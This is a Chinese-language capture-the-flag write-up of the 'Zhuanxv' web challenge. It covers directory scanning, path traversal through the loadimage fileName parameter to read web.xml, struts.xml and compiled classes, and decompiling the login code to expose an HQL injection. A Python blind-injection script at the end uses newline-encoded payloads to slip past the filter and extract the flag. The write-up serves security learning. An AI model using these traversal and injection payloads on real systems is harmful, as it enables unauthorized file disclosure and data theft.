攻防世界web进阶区Zhuanxv详解

wuming

发布于 2021-01-21 15:58:25

8751

发布于 2021-01-21 15:58:25

文章被收录于专栏：wuming_CTFwuming_CTF

1. 题目
1. 1.1. 提示:
2. 1.2. 详解

题目

提示:

详解

扫描目录发现了一个list 我们使用了好几个扫描工具，只有wwwscan，和webdirscan可以，（可能是我字典太菜了）

发现需要登录

查看源代码发现，这里有问题，加载图片的方式很诡异试试文件读取

他的cookie里有jessionid 说明他是使用JAVA写的网页那么我们尝试找找web.xml

../../WEB-INF/web.xml

有一个struts2 这个是struts的工作原理，以及一些讲解 apps-存放了所有Struts2的示例项目

docs-存放了所有Struts2与XWork的文档

lib-存放了所有Struts2相关的JAR文件以及Struts2运行时所依赖的JAR文件

src-存放了所有Struts2的源码，以Maven所指定的项目结构目录存放

https://blog.csdn.net/u010004082/article/details/79351459

读取struts.xml loadimage?fileName=../../WEB-INF/classes/struts.xml

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE struts PUBLIC
        "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
        "http://struts.apache.org/dtds/struts-2.3.dtd">
<struts>
    <constant name="strutsenableDynamicMethodInvocation" value="false"/>
    <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
    <constant name="struts.action.extension" value=","/>
    <package name="front" namespace="/" extends="struts-default">
        <global-exception-mappings>
            <exception-mapping exception="java.lang.Exception" result="error"/>
        </global-exception-mappings>
        <action name="zhuanxvlogin" class="com.cuitctf.action.UserLoginAction" method="execute">
            <result name="error">/ctfpage/login.jsp</result>
            <result name="success">/ctfpage/welcome.jsp</result>
        </action>
        <action name="loadimage" class="com.cuitctf.action.DownloadAction">
            <result name="success" type="stream">
                <param name="contentType">image/jpeg</param>
                <param name="contentDisposition">attachment;filename="bg.jpg"</param>
                <param name="inputName">downloadFile</param>
            </result>
            <result name="suffix_error">/ctfpage/welcome.jsp</result>
        </action>
    </package>
    <package name="back" namespace="/" extends="struts-default">
        <interceptors>
            <interceptor name="oa" class="com.cuitctf.util.UserOAuth"/>
            <interceptor-stack name="userAuth">
                <interceptor-ref name="defaultStack" />
                <interceptor-ref name="oa" />
            </interceptor-stack>

        </interceptors>
        <action name="list" class="com.cuitctf.action.AdminAction" method="execute">
            <interceptor-ref name="userAuth">
                <param name="excludeMethods">
                    execute
                </param>
            </interceptor-ref>
            <result name="login_error">/ctfpage/login.jsp</result>
            <result name="list_error">/ctfpage/welcome.jsp</result>
            <result name="success">/ctfpage/welcome.jsp</result>
        </action>
    </package>
</struts>

这里class里面可以看到很多class类名，尝试了一下，都可以逐个下载，点号换成正斜杠，然后再在后面加个.class就可以下载了，下载后用jd反编译class文件

发现一个看起来和登陆有关的类UserLoginAction,构造payload下载: ?fileName=../../WEB-INF/classes/com/cuitctf/action/UserLoginAction.class

我们使用jd-gui java反编译工具我们将文件下载，并修改为.class文件我们使用luyten反编译

package com.cuitctf.action;

import com.cuitctf.service.*;
import com.cuitctf.po.*;
import com.cuitctf.util.*;
import org.springframework.context.*;
import com.opensymphony.xwork2.*;
import java.util.regex.*;
import java.util.*;

public class UserLoginAction extends ActionSupport
{
    private UserService userService;
    private User user;
    
    public UserLoginAction() {
        final ApplicationContext context = InitApplicationContext.getApplicationContext();
        this.userService = (UserService)context.getBean("userService");
    }
    
    public String execute() throws Exception {
        System.out.println("start:" + this.user.getName());
        final ActionContext actionContext = ActionContext.getContext();
        final Map<String, Object> request = (Map<String, Object>)actionContext.get("request");
        try {
            if (!this.userCheck(this.user)) {
                request.put("error", "\u767b\u5f55\u5931\u8d25\uff0c\u8bf7\u68c0\u67e5\u7528\u6237\u540d\u548c\u5bc6\u7801");
                System.out.println("\u767b\u9646\u5931\u8d25");
                return "error";
            }
        }
        catch (Exception e) {
            e.printStackTrace();
            throw e;
        }
        System.out.println("login SUCCESS");
        ActionContext.getContext().getSession().put("user", this.user);
        return "success";
    }
    
    public boolean isValid(final String username) {
        final String valiidateString = "[a-zA-Z0-9]{1-16}";
        return matcher(valiidateString, username);
    }
    
    private static boolean matcher(final String reg, final String string) {
        boolean tem = false;
        final Pattern pattern = Pattern.compile(reg);
        final Matcher matcher = pattern.matcher(string);
        tem = matcher.matches();
        return tem;
    }
    
    public boolean userCheck(final User user) {
        final List<User> userList = (List<User>)this.userService.loginCheck(user.getName(), user.getPassword());
        if (userList != null && userList.size() == 1) {
            return true;
        }
        this.addActionError("Username or password is Wrong, please check!");
        return false;
    }
    
    public UserService getUserService() {
        return this.userService;
    }
    
    public void setUserService(final UserService userService) {
        this.userService = userService;
    }
    
    public User getUser() {
        return this.user;
    }
    
    public void setUser(final User user) {
        this.user = user;
    }
}

截取部分有用的代码

  public boolean userCheck(User user) {
 List<User> userList = this.userService.loginCheck(user.getName(), user.getPassword());
 if (userList != null && userList.size() == 1) {
   return true;
 }
 addActionError("Username or password is Wrong, please check!");
 return false;
}

发现还有一个userservicempl的类我们下载

public List <User> loginCheck(String name, String password) {
    name = name.replaceAll(" ", "");
    name = name.replaceAll("=", "");
    Matcher username_matcher = Pattern.compile("^[0-9a-zA-Z]+$").matcher(name);
    Matcher password_matcher = Pattern.compile("^[0-9a-zA-Z]+$").matcher(password);
    if (password_matcher.find()) {
        return this.userDao.loginCheck(name, password);
    }
    return null;
}

找到登录的规则

是登陆语句的过滤规则,在UserDaoImpl.class中找到:

public List < User > loginCheck(String name, String password) {
       return getHibernateTemplate().find("from User where name ='" + name + "' and password = '" + password + "'");  
   }

这里是大佬的盲注脚本

import requests
s=requests.session()

flag=''
for i in range(1,50):
    p=''
    for j in range(1,255):
          payload="(select%0Aascii(substr(id,"+str(i)+",1))%0Afrom%0AFlag%0Awhere%0Aid<2)<'"+str(j)+"'"
          url="http://111.198.29.45:35732/zhuanxvlogin?user.name=admin'%0Aor%0A"+payload+"%0Aor%0Aname%0Alike%0A'admin&user.password=1"
          r1=s.get(url)
          if len(r1.text)>20000 and p!='':
              flag+=p
              print i,flag
              break
          p=chr(j)